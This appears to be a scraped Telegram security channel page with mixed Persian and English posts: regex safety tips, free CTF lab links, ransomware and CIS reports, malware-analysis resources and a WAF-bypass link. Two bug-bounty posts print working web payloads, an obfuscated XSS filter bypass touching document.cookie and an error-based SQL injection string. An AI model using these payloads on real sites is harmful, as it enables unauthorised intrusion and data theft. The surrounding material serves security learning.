Network Security Channel
2.57K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
⭕️ Dangerous Regular Expressions

تو این پست Vickie Li از خطا های رایج در رجکس میگه و چندتا Best Practice برای رجکس های امن تر مثل اینکه:
- تا جایی که میشه برای چیزهایی مثل یوزرنیم و پسورد و ... خودتون رجکس ننویسید از رجکس های امن توی اینترنت استفاده کنید
- از Defense-in-depth استفاده کنید یعنی فقط به رجکس و اعتبار سنجی اش و ... اطمینان نکنید
- همچنین Fuzzing میتونه از اینکه رجکس شما داره درست کار میکنه یا نه اطمینان بیشتری حاصل کنه.

مطالعه بیشتر:
https://sec.okta.com/articles/2020/07/dangerous-regular-expressions

یه سری منابع هم معرفی شده برای امن تر کردن رجکس هاتون
https://owasp.org/www-community/OWASP_Validation_Regex_Repository
https://regexlib.com/DisplayPatterns.aspx
https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html

#regex #security #AppSec
@Engineer_Computer
👍2😁1
🔱 FREE LABS FOR RED TEAM/BLUE TEAM - 2023 🔱

· Attack-Defense - https://attackdefense.com
· Alert to win - https://alf.nu/alert1
· Bancocn - https://bancocn.com
· CTF Komodo Security - https://ctf.komodosec.com
· CryptoHack - https://cryptohack.org/
· CMD Challenge - https://cmdchallenge.com
· Explotation Education - https://exploit.education
· Google CTF - https://lnkd.in/e46drbz8
· HackTheBox - https://www.hackthebox.com
· Hackthis - https://www.hackthis.co.uk
· Hacksplaining - https://lnkd.in/eAB5CSTA
· Hacker101 - https://ctf.hacker101.com
· Capture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
· Hacking-Lab - https://hacking-lab.com/
· HSTRIKE - https://hstrike.com
· ImmersiveLabs - https://immersivelabs.com
· NewbieContest - https://lnkd.in/ewBk6fU5
· OverTheWire - https://overthewire.org
· Practical Pentest Labs - https://lnkd.in/esq9Yuv5
· Pentestlab - https://pentesterlab.com
· Hackaflag BR - https://hackaflag.com.br/
· Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
· PentestIT LAB - https://lab.pentestit.ru
· PicoCTF - https://picoctf.com
· PWNABLE - https://lnkd.in/eMEwBJzn
· Root-Me - https://www.root-me.org
· Root in Jail - https://rootinjail.com
· SANS Challenger - https://lnkd.in/e5TAMawK
· SmashTheStack - https://lnkd.in/eVn9rP9p
· The Cryptopals Crypto Challenges - https://cryptopals.com
· Try Hack Me - https://tryhackme.com
· Vulnhub - https://www.vulnhub.com
· W3Challs - https://w3challs.com
· WeChall - https://www.wechall.net
· Zenk-Security - https://lnkd.in/ewJ5rNx2
· Cyberdefenders - https://lnkd.in/dVcmjEw8
· LetsDefend- https://letsdefend.io/

@Engineer_Computer
2👍2🔥2🎉1
Scheduled Tasks CIS Critical Security Controls v8.pdf
3.9 MB
#مقاله CIS در خصوص استفاده از Task Schedule ویندوز در حملات
@Engineer_Computer
Ransomware_Task_Force_May_23.pdf
2.2 MB
Analytics
Ransomware Task Force: Gaining Ground" May 2023

@Engineer_Computer
Demystifying_Soft_Sec_Vulns.pdf
623.9 KB
Research
Sec code review
Bug, Fault, Error, or Weakness: Demystifying Software Security Vulnerabilities", 2023

]-> NIST Vulnerability Data Ontology:
https://github.com/usnistgov/vulntology

@Engineer_Computer
Alert! 9 new ransomware families emerge from leaked Babuk source code, capable of targeting Linux and ESXi environments
https://thehackernews.com/2023/05/babuk-source-code-sparks-9-new.html


@Engineer_Computer
XSS WAF Bypass using location concatenation:

Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">

#bugbounty #bugbountytips #xss #xssbypass
@Engineer_Computer
Some recent lessons learned:

If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving.

Payload example:

' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) #

#bugbountytips #BugBounty
@Engineer_Computer
Three projects will help you a lot in Malware Analysis
سه پروژه به شما در تجزیه و تحلیل بدافزار کمک زیادی می کند

1️⃣https://filesec.io/#
لیستی از پسوندهای فایل است که می تواند توسط مهاجمان برای phishing, execution, و ماکروها و غیره استفاده شود.
این منبع خوبی برای درک موارد استفاده مخرب از file extentionsرایج و راه هایی است که می توانید در برابر آنها دفاع کنید.
2️⃣ Windows LOLBINS >> https://lolbas-project.github.io/#


کلمه LOLBins اصطلاح اختصاری Living Off the Land Binaries است. این سایت باینری هایی با ماهیت غیر مخرب، که برای سیستم عامل شناخته شده و قانونی هستند را نشان میدهد که توسط مجرمان سایبری برای استتار فعالیت های مخرب خود قابل استفاده و بهره برداری قرار است.

3️⃣ Linux GTFOBINS >> https://gtfobins.github.io/

این GTFOBins پروژه‌ای است که توابع قانونی باینری‌های یونیکس را جمع‌آوری می‌کند که می‌توان از آن برای گرفتن شل، افزایش یا حفظ امتیازات بالا، انتقال فایل‌ها، spawn bind و reverse shell‌ها و تسهیل سایر وظایف پس از بهره‌برداری سوء استفاده کرد.

#blueteam #redteam #soc #forensiceanal #ioc #threatintelligence #threathunting
@Engineer_Computer
🔰 دانستن اینکه چه چیزی در پردازش های ویندوز عادی است، به کاهش نویز در فرآیند جستجوی بدافزار احتمالی کمک میکند.

🔱
https://sansorg.egnyte.com/dl/oQm41D67D6

🔴 از این اطلاعات به عنوان مرجع برای پردازش های عادی ویندوز استفاده کنید و توجه خودتون رو به موارد دیگر معطوف کنید.

@Engineer_Computer
SANS-DFIR(iDeFense).pdf
1.9 MB
پوستر بالا رو هم از لینک بالا و هم از اینجا میتونید دانلود کنید.
@Engineer_Computer
How to bypass Cloudflare, Incapsula, SUCURI and another WAF
https://miloserdov.org/?p=2960

@Engineer_Computer